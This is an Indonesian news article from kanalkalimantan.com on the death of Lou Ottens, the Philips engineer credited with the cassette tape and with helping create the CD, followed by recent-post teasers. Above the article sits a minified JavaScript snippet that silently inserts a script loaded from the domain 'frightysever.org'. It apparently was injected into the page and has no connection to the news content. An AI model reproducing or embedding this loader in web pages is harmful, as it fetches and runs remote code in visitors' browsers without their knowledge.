(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
INTERNASIONAL

Lou Ottens, Penemu Kaset dan CD Meninggal Dunia


KANALKALIMANTAN.COM – Lou Ottens, yang dianggap tidak hanya menemukan kaset tetapi juga membantu mengembangkan CD, meninggal di rumahnya di desa Duizel, Belanda bulan ini dalam usia 94 tahun.

“Kami sangat sedih harus memberi tahu Anda bahwa Lou meninggal dengan damai pada Sabtu, 6 Maret 2021,” kata putri Ottens, Arine Ottens, kepada WTOP News dilansir New York Post, Kamis (11/3/2021).

Seorang insinyur Belanda, Ottens mulai bekerja untuk perusahaan elektronik yang berbasis di Belanda Royal Philips di awal usia 20-an.

Pada 1960, setelah delapan tahun di perusahaan, dia menjadi kepala pengembangan produk, Dutch News melaporkan.

 

Baca Juga:
Gelar Operasi Kamtibmas Cipta Kondisi di Banjarmasin, Masih Ada Pemilik Cafe Abaikan Prokes

Dalam waktu satu tahun, dia dan timnya telah menciptakan alat perekam portabel pertama di dunia, sebuah penemuan yang akan merevolusi industri musik dan terjual lebih dari satu juta unit.

Di tahun ketiganya dalam peran tersebut, ia menemukan kaset, sebuah perkembangan yang terinspirasi oleh frustrasi Otten dengan rekaman pita audio magnetik gulungan terbuka yang berat.

“Saya kesal dengan sistem reel-to-reel yang kikuk dan tidak ramah pengguna, sesederhana itu,” kata Ottens dalam sebuah wawancara tentang apa yang memotivasi dia untuk membuat kaset kompak.

Dibandingkan dengan reel-to-reel, format rekaman pita magnetik analog barunya dianggap sebagai inovasi revolusioner dan mungil.

Rekaman baru ini juga memungkinkan pendengar dengan mudah merekam lagu dari radio, yang mengubah permainan pada saat itu – dan awal dari romansa “mixtape” yang tak terhitung jumlahnya.

Baca Juga:
Tok! Eks Sekretaris MA Nurhadi Divonis 6 tahun Penjara

Tim Ottens mempresentasikan kaset tape berbungkus plastik perdana mereka kepada dunia pada pameran elektronik 1963. Format musik yang “Lebih kecil dari sebungkus rokok!”

Kaset yang dipatenkan Philips menjadi hit dalam sekejap dan dengan cepat merevolusi industri musik, menelurkan mixtape profesional dan DIY yang tak terhitung jumlahnya, dengan lebih dari 100 miliar terjual.

Kemudian, pada 1970-an, Ottens membantu membuat CD, kreasi bersama Philips dan produser elektronik Jepang Sony yang membuat debut publiknya pada 1982.

Meskipun pengaruhnya sangat besar terhadap musik modern, dia tetap rendah hati tentang keterlibatannya.

“Saya tidak punya ‘telepon kebanggaan’,” kata Ottens dalam sebuah wawancara setelah pensiun pada 1986, menekankan bahwa kreasi adalah upaya tim.

Dalam wawancara lain, dia mengungkapkan pemahaman yang mendalam dan mendalam tentang keniscayaan perubahan, inovasi, dan perjalanan waktu.

“Semuanya lenyap di dunia ketika telah selesai pada waktunya. Aku juga,” katanya. (suara.com)


Al Ghifari

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

4 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

4 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

5 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

9 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

11 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

11 jam ago

This website uses cookies.